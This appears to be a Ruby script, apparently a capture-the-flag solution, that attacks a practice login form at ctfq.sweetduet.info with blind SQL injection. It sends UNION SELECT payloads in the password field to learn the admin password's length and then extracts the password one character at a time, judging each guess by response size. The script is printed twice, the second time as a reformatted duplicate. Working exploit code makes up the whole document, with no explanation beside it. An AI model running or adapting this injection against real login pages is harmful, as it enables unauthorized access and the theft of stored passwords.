kimitoboku/Login.rb

## Login.rb
require 'uri'
require 'net/http'

def http_request(method, uri, query_hash={})
  query = query_hash.map{|k, v| "#{k}=#{v}"}.join('&')
  query_escaped = URI.escape(query)
  uri_parsed = URI.parse(uri)
  http = Net::HTTP.new(uri_parsed.host,10080)
  return http.post(uri_parsed.path, query_escaped).body
end

url = 'http://ctfq.sweetduet.info/~q6/'
num = 0;

100.times do |i|
  req = {
    "id" => "admin",
    "pass" => "' UNION SELECT * FROM user WHERE id = 'admin' AND LENGTH(pass) <= #{i} --"
  }
  n = http_request("POST",url,req)
  if(n.size > 1000) then
    puts i
    num = i;
    break;
  end
end

ss = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+|~`\=-[]{};':,./<>?"

num.times do |i|
  ss.size.times do |j|
    req = {
      "id" => "admin",
      "pass" => "' UNION SELECT * FROM user WHERE id = 'admin' AND substr(pass, #{i+1}, 1) = '#{ss[j]}' --"
    }
    n = http_request("POST",url,req)
    if(n.size > 1000) then
      print ss[j]
      break
    end
  end
end
puts
	require 'uri'
	require 'net/http'

	def http_request(method, uri, query_hash={})
	query = query_hash.map{\|k, v\| "#{k}=#{v}"}.join('&')
	query_escaped = URI.escape(query)
	uri_parsed = URI.parse(uri)
	http = Net::HTTP.new(uri_parsed.host,10080)
	return http.post(uri_parsed.path, query_escaped).body
	end

	url = 'http://ctfq.sweetduet.info/~q6/'
	num = 0;

	100.times do \|i\|
	req = {
	"id" => "admin",
	"pass" => "' UNION SELECT * FROM user WHERE id = 'admin' AND LENGTH(pass) <= #{i} --"
	}
	n = http_request("POST",url,req)
	if(n.size > 1000) then
	puts i
	num = i;
	break;
	end
	end

	ss = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+\|~`\=-[]{};':,./<>?"

	num.times do \|i\|
	ss.size.times do \|j\|
	req = {
	"id" => "admin",
	"pass" => "' UNION SELECT * FROM user WHERE id = 'admin' AND substr(pass, #{i+1}, 1) = '#{ss[j]}' --"
	}
	n = http_request("POST",url,req)
	if(n.size > 1000) then
	print ss[j]
	break
	end
	end
	end
	puts